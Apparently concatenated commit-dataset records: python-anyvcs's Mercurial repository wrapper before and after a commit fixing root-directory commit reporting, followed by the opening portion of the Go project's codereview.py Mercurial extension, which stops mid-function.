if ls[0].get('type') != 'f':
raise BadFileType(rev, path)
return self._cat(str(rev), path)
def readlink(self, rev, path):
path = type(self).cleanPath(path)
ls = self.ls(rev, path, directory=True)
assert len(ls) == 1
if ls[0].get('type') != 'l':
raise BadFileType(rev, path)
return self._cat(str(rev), path)
def _parse_heads(self, cmd):
output = self._command(cmd)
results = []
for line in output.splitlines():
m = parse_heads_rx.match(line)
assert m, 'unexpected output: ' + line
results.append(m.group('name'))
return results
def branches(self):
cmd = [HG, 'branches']
return self._parse_heads(cmd)
def tags(self):
cmd = [HG, 'tags']
return self._parse_heads(cmd)
def bookmarks(self):
cmd = [HG, 'bookmarks']
output = self._command(cmd)
if output.startswith('no bookmarks set'):
return []
results = []
for line in output.splitlines():
m = bookmarks_rx.match(line)
assert m, 'unexpected output: ' + line
results.append(m.group('name'))
return results
def heads(self):
return self.branches() + self.tags() + self.bookmarks()
def empty(self):
cmd = [HG, 'log', '--template=a', '-l1']
output = self._command(cmd)
return output == ''
def __contains__(self, rev):
cmd = [HG, 'log', '--template=a', '-r', str(rev)]
p = subprocess.Popen(cmd, cwd=self.path, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
return p.returncode == 0
def __len__(self):
cmd = [HG, 'id', '-n', '-r', 'tip']
output = self._command(cmd)
return int(output) + 1
def log(self, revrange=None, limit=None, firstparent=False, merges=None,
path=None, follow=False):
cmd = [HG, 'log', '--debug', '--template={node}\\0{parents}\\0'
'{date|hgdate}\\0{author|nonempty}\\0{desc|tabindent|nonempty}\\0\\0']
if limit is not None:
cmd.append('-l' + str(limit))
if firstparent:
cmd.append('--follow-first')
if merges is not None:
if merges:
cmd.append('--only-merges')
else:
cmd.append('--no-merges')
single = False
if revrange is None:
pass
elif isinstance(revrange, (tuple, list)):
if revrange[0] is None:
if revrange[1] is None:
pass
else:
cmd.extend(['-r', 'reverse(ancestors(%s))' % revrange[1]])
else:
if revrange[1] is None:
cmd.extend(['-r', 'reverse(descendants(%s))' % revrange[0]])
else:
cmd.extend(['-r', 'reverse(ancestors(%s))' % revrange[1], '--prune', str(revrange[0])])
else:
cmd.extend(['-r', str(revrange)])
single = True
if path:
if follow:
cmd.append('--follow')
cmd.extend(['--', type(self).cleanPath(path)])
output = self._command(cmd)
results = []
logs = output.split('\0\0')
logs.pop()
for log in logs:
rev, parents, date, author, message = log.split('\0', 4)
parents = [x[1] for x in filter(lambda x: x[0] != '-1',
(x.split(':') for x in parents.split()))]
date = parse_hgdate(date)
message = message.replace('\n\t', '\n')
entry = CommitLogEntry(rev, parents, date, author, message)
if single:
return entry
results.append(entry)
return results
def pdiff(self, rev):
cmd = [HG, 'log', '--template=a', '-p', '-r', str(rev)]
return self._command(cmd)[1:]
def diff(self, rev_a, rev_b, path=None):
cmd = [HG, 'diff', '-r', rev_a, '-r', rev_b]
if path is not None:
cmd.extend(['--', type(self).cleanPath(path)])
return self._command(cmd)
def ancestor(self, rev1, rev2):
cmd = [HG, 'log', '--template={node}', '-r', 'ancestor(%s, %s)' % (rev1, rev2)]
output = self._command(cmd)
if output == '':
return None
else:
return output
def _blame(self, rev, path):
cmd = [HG, 'annotate', '-unv', '-r', rev, '--', path]
output = self._command(cmd)
revs = {}
results = []
cat = self._cat(rev, path)
for line, text in zip(output.splitlines(), cat.splitlines()):
m = annotate_rx.match(line)
assert m, 'unexpected output: ' + line
rev, author = m.group('rev', 'author')
try:
rev, date = revs[rev]
except KeyError:
cmd = [HG, 'log', '--template={node}\n{date|hgdate}', '-r', rev]
rev, date = self._command(cmd).split('\n', 1)
date = parse_hgdate(date)
revs[rev] = rev, date
results.append(blame_tuple(rev, author, date, text))
return results
def blame(self, rev, path):
path = type(self).cleanPath(path)
ls = self.ls(rev, path, directory=True)
assert len(ls) == 1
if ls[0].get('type') != 'f':
raise BadFileType(rev, path)
return self._blame(str(rev), path)
correctly report commit for / when directory=True
# Copyright 2013 Clemson University
#
# This file is part of python-anyvcs.
#
# python-anyvcs is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# python-anyvcs is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with python-anyvcs. If not, see <http://www.gnu.org/licenses/>.
import datetime
import re
import subprocess
from common import *
HG = 'hg'
manifest_rx = re.compile(r'^(?P<mode>[0-7]{3}) (?P<type>.) (?P<name>.+)$')
parse_heads_rx = re.compile(r'^(?P<name>.+?)\s+(?P<rev>-?\d+):(?P<nodeid>[0-9a-f]+)', re.I)
bookmarks_rx = re.compile(r'^\s+(?:\*\s+)?(?P<name>.+?)\s+(?P<rev>\d+):(?P<nodeid>[0-9a-f]+)', re.I)
annotate_rx = re.compile(r'^(?P<author>.*)\s+(?P<rev>\d+):\s')
def parent_dirs(path):
ds = path.find('/')
while ds != -1:
yield path[:ds]
ds = path.find('/', ds + 1)
def parse_hgdate(datestr):
ts, tzoffset = datestr.split(None, 1)
date = datetime.datetime.fromtimestamp(float(ts))
return date.replace(tzinfo=UTCOffset(-int(tzoffset)/60))
class HgRepo(VCSRepo):
@classmethod
def create(cls, path):
cmd = [HG, 'init', path]
subprocess.check_call(cmd)
return cls(path)
@property
def private_path(self):
import os
path = os.path.join(self.path, '.hg', '.private')
try:
os.mkdir(path)
except OSError as e:
import errno
if e.errno != errno.EEXIST:
raise
return path
def _ls(self, rev, path, recursive=False, recursive_dirs=False,
directory=False):
forcedir = False
if path.endswith('/'):
forcedir = True
path = path.rstrip('/')
if path == '':
ltrim = 0
prefix = ''
else:
ltrim = len(path) + 1
prefix = path + '/'
cmd = [HG, 'manifest', '-v', '-r', rev]
output = self._command(cmd)
dirs = set()
exists = False
for line in output.splitlines():
m = manifest_rx.match(line)
assert m, 'unexpected output: ' + line
t, name = m.group('type', 'name')
if name.startswith(prefix) or (not forcedir and name == path):
if directory and name.startswith(prefix):
yield ('d', '')
return
exists = True
entry_name = name[ltrim:]
if '/' in entry_name:
p = parent_dirs(entry_name)
if not recursive:
d = p.next()
if d not in dirs:
dirs.add(d)
yield ('d', d)
continue
if recursive_dirs:
for d in p:
if d not in dirs:
dirs.add(d)
yield ('d', d)
yield (t, entry_name)
if not exists:
raise PathDoesNotExist(rev, path)
def ls(self, rev, path, recursive=False, recursive_dirs=False,
directory=False, report=()):
revstr = str(rev)
path = type(self).cleanPath(path)
if path == '':
if directory:
entry = attrdict(type='d')
if 'commit' in report:
cmd = [HG, 'log', '--template={node}', '-r', revstr]
entry.commit = self._command(cmd)
return [entry]
if True and 'commit' in report:
import tempfile
with tempfile.NamedTemporaryFile() as style:
style.write(
r"changeset = '{rev}\n{node}\n{files}\0'" '\n'
r"file = '{file|escape}\n'" '\n'
)
style.flush()
cmd = [HG, 'log', '--style', style.name, '-r', 'reverse(ancestors('+revstr+'))']
log = self._command(cmd).split('\0')
else:
log = None
results = []
for t, name in self._ls(revstr, path, recursive, recursive_dirs, directory):
entry = attrdict()
if name:
entry.name = name
if t == 'd':
entry.type = 'd'
elif t in ' *':
entry.type = 'f'
if 'executable' in report:
entry.executable = t == '*'
if 'size' in report:
entry.size = len(self._cat(revstr, name))
elif t == '@':
entry.type = 'l'
if 'target' in report:
entry.target = self._cat(revstr, name)
else:
assert False, 'unexpected output: ' + line
if 'commit' in report:
p = type(self).cleanPath(path + '/' + name)
if log is None:
cmd = [HG, 'log', '--template={node}', '-l1', '-r', 'reverse(ancestors('+revstr+'))', '--', p]
entry.commit = self._command(cmd)
else:
for logentry in log:
lines = logentry.splitlines()
found = False
for l in lines[2:]:
if l == p or l.startswith(p+'/'):
found = True
break
if found:
entry.commit = lines[1]
break
results.append(entry)
return results
def _cat(self, rev, path):
cmd = [HG, 'cat', '-r', rev, path]
return self._command(cmd)
def cat(self, rev, path):
path = type(self).cleanPath(path)
ls = self.ls(rev, path, directory=True)
assert len(ls) == 1
if ls[0].get('type') != 'f':
raise BadFileType(rev, path)
return self._cat(str(rev), path)
def readlink(self, rev, path):
path = type(self).cleanPath(path)
ls = self.ls(rev, path, directory=True)
assert len(ls) == 1
if ls[0].get('type') != 'l':
raise BadFileType(rev, path)
return self._cat(str(rev), path)
def _parse_heads(self, cmd):
output = self._command(cmd)
results = []
for line in output.splitlines():
m = parse_heads_rx.match(line)
assert m, 'unexpected output: ' + line
results.append(m.group('name'))
return results
def branches(self):
cmd = [HG, 'branches']
return self._parse_heads(cmd)
def tags(self):
cmd = [HG, 'tags']
return self._parse_heads(cmd)
def bookmarks(self):
cmd = [HG, 'bookmarks']
output = self._command(cmd)
if output.startswith('no bookmarks set'):
return []
results = []
for line in output.splitlines():
m = bookmarks_rx.match(line)
assert m, 'unexpected output: ' + line
results.append(m.group('name'))
return results
def heads(self):
return self.branches() + self.tags() + self.bookmarks()
def empty(self):
cmd = [HG, 'log', '--template=a', '-l1']
output = self._command(cmd)
return output == ''
def __contains__(self, rev):
cmd = [HG, 'log', '--template=a', '-r', str(rev)]
p = subprocess.Popen(cmd, cwd=self.path, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
return p.returncode == 0
def __len__(self):
cmd = [HG, 'id', '-n', '-r', 'tip']
output = self._command(cmd)
return int(output) + 1
def log(self, revrange=None, limit=None, firstparent=False, merges=None,
path=None, follow=False):
cmd = [HG, 'log', '--debug', '--template={node}\\0{parents}\\0'
'{date|hgdate}\\0{author|nonempty}\\0{desc|tabindent|nonempty}\\0\\0']
if limit is not None:
cmd.append('-l' + str(limit))
if firstparent:
cmd.append('--follow-first')
if merges is not None:
if merges:
cmd.append('--only-merges')
else:
cmd.append('--no-merges')
single = False
if revrange is None:
pass
elif isinstance(revrange, (tuple, list)):
if revrange[0] is None:
if revrange[1] is None:
pass
else:
cmd.extend(['-r', 'reverse(ancestors(%s))' % revrange[1]])
else:
if revrange[1] is None:
cmd.extend(['-r', 'reverse(descendants(%s))' % revrange[0]])
else:
cmd.extend(['-r', 'reverse(ancestors(%s))' % revrange[1], '--prune', str(revrange[0])])
else:
cmd.extend(['-r', str(revrange)])
single = True
if path:
if follow:
cmd.append('--follow')
cmd.extend(['--', type(self).cleanPath(path)])
output = self._command(cmd)
results = []
logs = output.split('\0\0')
logs.pop()
for log in logs:
rev, parents, date, author, message = log.split('\0', 4)
parents = [x[1] for x in filter(lambda x: x[0] != '-1',
(x.split(':') for x in parents.split()))]
date = parse_hgdate(date)
message = message.replace('\n\t', '\n')
entry = CommitLogEntry(rev, parents, date, author, message)
if single:
return entry
results.append(entry)
return results
def pdiff(self, rev):
cmd = [HG, 'log', '--template=a', '-p', '-r', str(rev)]
return self._command(cmd)[1:]
def diff(self, rev_a, rev_b, path=None):
cmd = [HG, 'diff', '-r', rev_a, '-r', rev_b]
if path is not None:
cmd.extend(['--', type(self).cleanPath(path)])
return self._command(cmd)
def ancestor(self, rev1, rev2):
cmd = [HG, 'log', '--template={node}', '-r', 'ancestor(%s, %s)' % (rev1, rev2)]
output = self._command(cmd)
if output == '':
return None
else:
return output
def _blame(self, rev, path):
cmd = [HG, 'annotate', '-unv', '-r', rev, '--', path]
output = self._command(cmd)
revs = {}
results = []
cat = self._cat(rev, path)
for line, text in zip(output.splitlines(), cat.splitlines()):
m = annotate_rx.match(line)
assert m, 'unexpected output: ' + line
rev, author = m.group('rev', 'author')
try:
rev, date = revs[rev]
except KeyError:
cmd = [HG, 'log', '--template={node}\n{date|hgdate}', '-r', rev]
rev, date = self._command(cmd).split('\n', 1)
date = parse_hgdate(date)
revs[rev] = rev, date
results.append(blame_tuple(rev, author, date, text))
return results
def blame(self, rev, path):
path = type(self).cleanPath(path)
ls = self.ls(rev, path, directory=True)
assert len(ls) == 1
if ls[0].get('type') != 'f':
raise BadFileType(rev, path)
return self._blame(str(rev), path)
|
# coding=utf-8
# (The line above is necessary so that I can use 世界 in the
# *comment* below without Python getting all bent out of shape.)
# Copyright 2007-2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''Mercurial interface to codereview.appspot.com.
To configure, set the following options in
your repository's .hg/hgrc file.
[extensions]
codereview = /path/to/codereview.py
[codereview]
server = codereview.appspot.com
The server should be running Rietveld; see http://code.google.com/p/rietveld/.
In addition to the new commands, this extension introduces
the file pattern syntax @nnnnnn, where nnnnnn is a change list
number, to mean the files included in that change list, which
must be associated with the current client.
For example, if change 123456 contains the files x.go and y.go,
"hg diff @123456" is equivalent to"hg diff x.go y.go".
'''
import sys
if __name__ == "__main__":
print >>sys.stderr, "This is a Mercurial extension and should not be invoked directly."
sys.exit(2)
# We require Python 2.6 for the json package.
if sys.version < '2.6':
print >>sys.stderr, "The codereview extension requires Python 2.6 or newer."
print >>sys.stderr, "You are running Python " + sys.version
sys.exit(2)
import json
import os
import re
import stat
import subprocess
import threading
import time
from mercurial import commands as hg_commands
from mercurial import util as hg_util
defaultcc = None
codereview_disabled = None
real_rollback = None
releaseBranch = None
server = "codereview.appspot.com"
server_url_base = None
#######################################################################
# Normally I would split this into multiple files, but it simplifies
# import path headaches to keep it all in one file. Sorry.
# The different parts of the file are separated by banners like this one.
#######################################################################
# Helpers
def RelativePath(path, cwd):
n = len(cwd)
if path.startswith(cwd) and path[n] == '/':
return path[n+1:]
return path
def Sub(l1, l2):
return [l for l in l1 if l not in l2]
def Add(l1, l2):
l = l1 + Sub(l2, l1)
l.sort()
return l
def Intersect(l1, l2):
return [l for l in l1 if l in l2]
#######################################################################
# RE: UNICODE STRING HANDLING
#
# Python distinguishes between the str (string of bytes)
# and unicode (string of code points) types. Most operations
# work on either one just fine, but some (like regexp matching)
# require unicode, and others (like write) require str.
#
# As befits the language, Python hides the distinction between
# unicode and str by converting between them silently, but
# *only* if all the bytes/code points involved are 7-bit ASCII.
# This means that if you're not careful, your program works
# fine on "hello, world" and fails on "hello, 世界". And of course,
# the obvious way to be careful - use static types - is unavailable.
# So the only way is trial and error to find where to put explicit
# conversions.
#
# Because more functions do implicit conversion to str (string of bytes)
# than do implicit conversion to unicode (string of code points),
# the convention in this module is to represent all text as str,
# converting to unicode only when calling a unicode-only function
# and then converting back to str as soon as possible.
def typecheck(s, t):
if type(s) != t:
raise hg_util.Abort("type check failed: %s has type %s != %s" % (repr(s), type(s), t))
# If we have to pass unicode instead of str, ustr does that conversion clearly.
def ustr(s):
typecheck(s, str)
return s.decode("utf-8")
# Even with those, Mercurial still sometimes turns unicode into str
# and then tries to use it as ascii. Change Mercurial's default.
def set_mercurial_encoding_to_utf8():
from mercurial import encoding
encoding.encoding = 'utf-8'
set_mercurial_encoding_to_utf8()
# Even with those we still run into problems.
# I tried to do things by the book but could not convince
# Mercurial to let me check in a change with UTF-8 in the
# CL description or author field, no matter how many conversions
# between str and unicode I inserted and despite changing the
# default encoding. I'm tired of this game, so set the default
# encoding for all of Python to 'utf-8', not 'ascii'.
def default_to_utf8():
import sys
stdout, __stdout__ = sys.stdout, sys.__stdout__
reload(sys) # site.py deleted setdefaultencoding; get it back
sys.stdout, sys.__stdout__ = stdout, __stdout__
sys.setdefaultencoding('utf-8')
default_to_utf8()
#######################################################################
# Status printer for long-running commands
global_status = None
def set_status(s):
if verbosity > 0:
print >>sys.stderr, time.asctime(), s
global global_status
global_status = s
class StatusThread(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
def run(self):
# pause a reasonable amount of time before
# starting to display status messages, so that
# most hg commands won't ever see them.
time.sleep(30)
# now show status every 15 seconds
while True:
time.sleep(15 - time.time() % 15)
s = global_status
if s is None:
continue
if s == "":
s = "(unknown status)"
print >>sys.stderr, time.asctime(), s
def start_status_thread():
t = StatusThread()
t.setDaemon(True) # allowed to exit if t is still running
t.start()
#######################################################################
# Change list parsing.
#
# Change lists are stored in .hg/codereview/cl.nnnnnn
# where nnnnnn is the number assigned by the code review server.
# Most data about a change list is stored on the code review server
# too: the description, reviewer, and cc list are all stored there.
# The only thing in the cl.nnnnnn file is the list of relevant files.
# Also, the existence of the cl.nnnnnn file marks this repository
# as the one where the change list lives.
emptydiff = """Index: ~rietveld~placeholder~
===================================================================
diff --git a/~rietveld~placeholder~ b/~rietveld~placeholder~
new file mode 100644
"""
class CL(object):
def __init__(self, name):
typecheck(name, str)
self.name = name
self.desc = ''
self.files = []
self.reviewer = []
self.cc = []
self.url = ''
self.local = False
self.web = False
self.copied_from = None # None means current user
self.mailed = False
self.private = False
self.lgtm = []
def DiskText(self):
cl = self
s = ""
if cl.copied_from:
s += "Author: " + cl.copied_from + "\n\n"
if cl.private:
s += "Private: " + str(self.private) + "\n"
s += "Mailed: " + str(self.mailed) + "\n"
s += "Description:\n"
s += Indent(cl.desc, "\t")
s += "Files:\n"
for f in cl.files:
s += "\t" + f + "\n"
typecheck(s, str)
return s
def EditorText(self):
cl = self
s = _change_prolog
s += "\n"
if cl.copied_from:
s += "Author: " + cl.copied_from + "\n"
if cl.url != '':
s += 'URL: ' + cl.url + ' # cannot edit\n\n'
if cl.private:
s += "Private: True\n"
s += "Reviewer: " + JoinComma(cl.reviewer) + "\n"
s += "CC: " + JoinComma(cl.cc) + "\n"
s += "\n"
s += "Description:\n"
if cl.desc == '':
s += "\t<enter description here>\n"
else:
s += Indent(cl.desc, "\t")
s += "\n"
if cl.local or cl.name == "new":
s += "Files:\n"
for f in cl.files:
s += "\t" + f + "\n"
s += "\n"
typecheck(s, str)
return s
def PendingText(self, quick=False):
cl = self
s = cl.name + ":" + "\n"
s += Indent(cl.desc, "\t")
s += "\n"
if cl.copied_from:
s += "\tAuthor: " + cl.copied_from + "\n"
if not quick:
s += "\tReviewer: " + JoinComma(cl.reviewer) + "\n"
for (who, line) in cl.lgtm:
s += "\t\t" + who + ": " + line + "\n"
s += "\tCC: " + JoinComma(cl.cc) + "\n"
s += "\tFiles:\n"
for f in cl.files:
s += "\t\t" + f + "\n"
typecheck(s, str)
return s
def Flush(self, ui, repo):
if self.name == "new":
self.Upload(ui, repo, gofmt_just_warn=True, creating=True)
dir = CodeReviewDir(ui, repo)
path = dir + '/cl.' + self.name
f = open(path+'!', "w")
f.write(self.DiskText())
f.close()
if sys.platform == "win32" and os.path.isfile(path):
os.remove(path)
os.rename(path+'!', path)
if self.web and not self.copied_from:
EditDesc(self.name, desc=self.desc,
reviewers=JoinComma(self.reviewer), cc=JoinComma(self.cc),
private=self.private)
def Delete(self, ui, repo):
dir = CodeReviewDir(ui, repo)
os.unlink(dir + "/cl." + self.name)
def Subject(self):
s = line1(self.desc)
if len(s) > 60:
s = s[0:55] + "..."
if self.name != "new":
s = "code review %s: %s" % (self.name, s)
typecheck(s, str)
return s
def Upload(self, ui, repo, send_mail=False, gofmt=True, gofmt_just_warn=False, creating=False, quiet=False):
if not self.files and not creating:
ui.warn("no files in change list\n")
if ui.configbool("codereview", "force_gofmt", True) and gofmt:
CheckFormat(ui, repo, self.files, just_warn=gofmt_just_warn)
set_status("uploading CL metadata + diffs")
os.chdir(repo.root)
form_fields = [
("content_upload", "1"),
("reviewers", JoinComma(self.reviewer)),
("cc", JoinComma(self.cc)),
("description", self.desc),
("base_hashes", ""),
]
if self.name != "new":
form_fields.append(("issue", self.name))
vcs = None
# We do not include files when creating the issue,
# because we want the patch sets to record the repository
# and base revision they are diffs against. We use the patch
# set message for that purpose, but there is no message with
# the first patch set. Instead the message gets used as the
# new CL's overall subject. So omit the diffs when creating
# and then we'll run an immediate upload.
# This has the effect that every CL begins with an empty "Patch set 1".
if self.files and not creating:
vcs = MercurialVCS(upload_options, ui, repo)
data = vcs.GenerateDiff(self.files)
files = vcs.GetBaseFiles(data)
if len(data) > MAX_UPLOAD_SIZE:
uploaded_diff_file = []
form_fields.append(("separate_patches", "1"))
else:
uploaded_diff_file = [("data", "data.diff", data)]
else:
uploaded_diff_file = [("data", "data.diff", emptydiff)]
if vcs and self.name != "new":
form_fields.append(("subject", "diff -r " + vcs.base_rev + " " + ui.expandpath("default")))
else:
# First upload sets the subject for the CL itself.
form_fields.append(("subject", self.Subject()))
ctype, body = EncodeMultipartFormData(form_fields, uploaded_diff_file)
response_body = MySend("/upload", body, content_type=ctype)
patchset = None
msg = response_body
lines = msg.splitlines()
if len(lines) >= 2:
msg = lines[0]
patchset = lines[1].strip()
patches = [x.split(" ", 1) for x in lines[2:]]
if response_body.startswith("Issue updated.") and quiet:
pass
else:
ui.status(msg + "\n")
set_status("uploaded CL metadata + diffs")
if not response_body.startswith("Issue created.") and not response_body.startswith("Issue updated."):
raise hg_util.Abort("failed to update issue: " + response_body)
issue = msg[msg.rfind("/")+1:]
self.name = issue
if not self.url:
self.url = server_url_base + self.name
if not uploaded_diff_file:
set_status("uploading patches")
patches = UploadSeparatePatches(issue, rpc, patchset, data, upload_options)
if vcs:
set_status("uploading base files")
vcs.UploadBaseFiles(issue, rpc, patches, patchset, upload_options, files)
if send_mail:
set_status("sending mail")
MySend("/" + issue + "/mail", payload="")
self.web = True
set_status("flushing changes to disk")
self.Flush(ui, repo)
return
def Mail(self, ui, repo):
pmsg = "Hello " + JoinComma(self.reviewer)
if self.cc:
pmsg += " (cc: %s)" % (', '.join(self.cc),)
pmsg += ",\n"
pmsg += "\n"
repourl = ui.expandpath("default")
if not self.mailed:
pmsg += "I'd like you to review this change to\n" + repourl + "\n"
else:
pmsg += "Please take another look.\n"
typecheck(pmsg, str)
PostMessage(ui, self.name, pmsg, subject=self.Subject())
self.mailed = True
self.Flush(ui, repo)
def GoodCLName(name):
typecheck(name, str)
return re.match("^[0-9]+$", name)
def ParseCL(text, name):
typecheck(text, str)
typecheck(name, str)
sname = None
lineno = 0
sections = {
'Author': '',
'Description': '',
'Files': '',
'URL': '',
'Reviewer': '',
'CC': '',
'Mailed': '',
'Private': '',
}
for line in text.split('\n'):
lineno += 1
line = line.rstrip()
if line != '' and line[0] == '#':
continue
if line == '' or line[0] == ' ' or line[0] == '\t':
if sname == None and line != '':
return None, lineno, 'text outside section'
if sname != None:
sections[sname] += line + '\n'
continue
p = line.find(':')
if p >= 0:
s, val = line[:p].strip(), line[p+1:].strip()
if s in sections:
sname = s
if val != '':
sections[sname] += val + '\n'
continue
return None, lineno, 'malformed section header'
for k in sections:
sections[k] = StripCommon(sections[k]).rstrip()
cl = CL(name)
if sections['Author']:
cl.copied_from = sections['Author']
cl.desc = sections['Description']
for line in sections['Files'].split('\n'):
i = line.find('#')
if i >= 0:
line = line[0:i].rstrip()
line = line.strip()
if line == '':
continue
cl.files.append(line)
cl.reviewer = SplitCommaSpace(sections['Reviewer'])
cl.cc = SplitCommaSpace(sections['CC'])
cl.url = sections['URL']
if sections['Mailed'] != 'False':
# Odd default, but avoids spurious mailings when
# reading old CLs that do not have a Mailed: line.
# CLs created with this update will always have
# Mailed: False on disk.
cl.mailed = True
if sections['Private'] in ('True', 'true', 'Yes', 'yes'):
cl.private = True
if cl.desc == '<enter description here>':
cl.desc = ''
return cl, 0, ''
def SplitCommaSpace(s):
typecheck(s, str)
s = s.strip()
if s == "":
return []
return re.split(", *", s)
def CutDomain(s):
typecheck(s, str)
i = s.find('@')
if i >= 0:
s = s[0:i]
return s
def JoinComma(l):
for s in l:
typecheck(s, str)
return ", ".join(l)
def ExceptionDetail():
s = str(sys.exc_info()[0])
if s.startswith("<type '") and s.endswith("'>"):
s = s[7:-2]
elif s.startswith("<class '") and s.endswith("'>"):
s = s[8:-2]
arg = str(sys.exc_info()[1])
if len(arg) > 0:
s += ": " + arg
return s
def IsLocalCL(ui, repo, name):
return GoodCLName(name) and os.access(CodeReviewDir(ui, repo) + "/cl." + name, 0)
# Load CL from disk and/or the web.
def LoadCL(ui, repo, name, web=True):
typecheck(name, str)
set_status("loading CL " + name)
if not GoodCLName(name):
return None, "invalid CL name"
dir = CodeReviewDir(ui, repo)
path = dir + "cl." + name
if os.access(path, 0):
ff = open(path)
text = ff.read()
ff.close()
cl, lineno, err = ParseCL(text, name)
if err != "":
return None, "malformed CL data: "+err
cl.local = True
else:
cl = CL(name)
if web:
set_status("getting issue metadata from web")
d = JSONGet(ui, "/api/" + name + "?messages=true")
set_status(None)
if d is None:
return None, "cannot load CL %s from server" % (name,)
if 'owner_email' not in d or 'issue' not in d or str(d['issue']) != name:
return None, "malformed response loading CL data from code review server"
cl.dict = d
cl.reviewer = d.get('reviewers', [])
cl.cc = d.get('cc', [])
if cl.local and cl.copied_from and cl.desc:
# local copy of CL written by someone else
# and we saved a description. use that one,
# so that committers can edit the description
# before doing hg submit.
pass
else:
cl.desc = d.get('description', "")
cl.url = server_url_base + name
cl.web = True
cl.private = d.get('private', False) != False
cl.lgtm = []
for m in d.get('messages', []):
if m.get('approval', False) == True or m.get('disapproval', False) == True:
who = re.sub('@.*', '', m.get('sender', ''))
text = re.sub("\n(.|\n)*", '', m.get('text', ''))
cl.lgtm.append((who, text))
set_status("loaded CL " + name)
return cl, ''
class LoadCLThread(threading.Thread):
def __init__(self, ui, repo, dir, f, web):
threading.Thread.__init__(self)
self.ui = ui
self.repo = repo
self.dir = dir
self.f = f
self.web = web
self.cl = None
def run(self):
cl, err = LoadCL(self.ui, self.repo, self.f[3:], web=self.web)
if err != '':
self.ui.warn("loading "+self.dir+self.f+": " + err + "\n")
return
self.cl = cl
# Load all the CLs from this repository.
def LoadAllCL(ui, repo, web=True):
dir = CodeReviewDir(ui, repo)
m = {}
files = [f for f in os.listdir(dir) if f.startswith('cl.')]
if not files:
return m
active = []
first = True
for f in files:
t = LoadCLThread(ui, repo, dir, f, web)
t.start()
if web and first:
# first request: wait in case it needs to authenticate
# otherwise we get lots of user/password prompts
# running in parallel.
t.join()
if t.cl:
m[t.cl.name] = t.cl
first = False
else:
active.append(t)
for t in active:
t.join()
if t.cl:
m[t.cl.name] = t.cl
return m
# Find repository root. On error, ui.warn and return None
def RepoDir(ui, repo):
url = repo.url();
if not url.startswith('file:'):
ui.warn("repository %s is not in local file system\n" % (url,))
return None
url = url[5:]
if url.endswith('/'):
url = url[:-1]
typecheck(url, str)
return url
# Find (or make) code review directory. On error, ui.warn and return None
def CodeReviewDir(ui, repo):
dir = RepoDir(ui, repo)
if dir == None:
return None
dir += '/.hg/codereview/'
if not os.path.isdir(dir):
try:
os.mkdir(dir, 0700)
except:
ui.warn('cannot mkdir %s: %s\n' % (dir, ExceptionDetail()))
return None
typecheck(dir, str)
return dir
# Turn leading tabs into spaces, so that the common white space
# prefix doesn't get confused when people's editors write out
# some lines with spaces, some with tabs. Only a heuristic
# (some editors don't use 8 spaces either) but a useful one.
def TabsToSpaces(line):
i = 0
while i < len(line) and line[i] == '\t':
i += 1
return ' '*(8*i) + line[i:]
# Strip maximal common leading white space prefix from text
def StripCommon(text):
typecheck(text, str)
ws = None
for line in text.split('\n'):
line = line.rstrip()
if line == '':
continue
line = TabsToSpaces(line)
white = line[:len(line)-len(line.lstrip())]
if ws == None:
ws = white
else:
common = ''
for i in range(min(len(white), len(ws))+1):
if white[0:i] == ws[0:i]:
common = white[0:i]
ws = common
if ws == '':
break
if ws == None:
return text
t = ''
for line in text.split('\n'):
line = line.rstrip()
line = TabsToSpaces(line)
if line.startswith(ws):
line = line[len(ws):]
if line == '' and t == '':
continue
t += line + '\n'
while len(t) >= 2 and t[-2:] == '\n\n':
t = t[:-1]
typecheck(t, str)
return t
# Indent text with indent.
def Indent(text, indent):
typecheck(text, str)
typecheck(indent, str)
t = ''
for line in text.split('\n'):
t += indent + line + '\n'
typecheck(t, str)
return t
# Return the first line of l
def line1(text):
typecheck(text, str)
return text.split('\n')[0]
_change_prolog = """# Change list.
# Lines beginning with # are ignored.
# Multi-line values should be indented.
"""
desc_re = '^(.+: |(tag )?(release|weekly)\.|fix build|undo CL)'
desc_msg = '''Your CL description appears not to use the standard form.
The first line of your change description is conventionally a
one-line summary of the change, prefixed by the primary affected package,
and is used as the subject for code review mail; the rest of the description
elaborates.
Examples:
encoding/rot13: new package
math: add IsInf, IsNaN
net: fix cname in LookupHost
unicode: update to Unicode 5.0.2
'''
def promptyesno(ui, msg):
return ui.promptchoice(msg, ["&yes", "&no"], 0) == 0
def promptremove(ui, repo, f):
if promptyesno(ui, "hg remove %s (y/n)?" % (f,)):
if hg_commands.remove(ui, repo, 'path:'+f) != 0:
ui.warn("error removing %s" % (f,))
def promptadd(ui, repo, f):
if promptyesno(ui, "hg add %s (y/n)?" % (f,)):
if hg_commands.add(ui, repo, 'path:'+f) != 0:
ui.warn("error adding %s" % (f,))
def EditCL(ui, repo, cl):
set_status(None) # do not show status
s = cl.EditorText()
while True:
s = ui.edit(s, ui.username())
# We can't trust Mercurial + Python not to die before making the change,
# so, by popular demand, just scribble the most recent CL edit into
# $(hg root)/last-change so that if Mercurial does die, people
# can look there for their work.
try:
f = open(repo.root+"/last-change", "w")
f.write(s)
f.close()
except:
pass
clx, line, err = ParseCL(s, cl.name)
if err != '':
if not promptyesno(ui, "error parsing change list: line %d: %s\nre-edit (y/n)?" % (line, err)):
return "change list not modified"
continue
# Check description.
if clx.desc == '':
if promptyesno(ui, "change list should have a description\nre-edit (y/n)?"):
continue
elif re.search('<enter reason for undo>', clx.desc):
if promptyesno(ui, "change list description omits reason for undo\nre-edit (y/n)?"):
continue
elif not re.match(desc_re, clx.desc.split('\n')[0]):
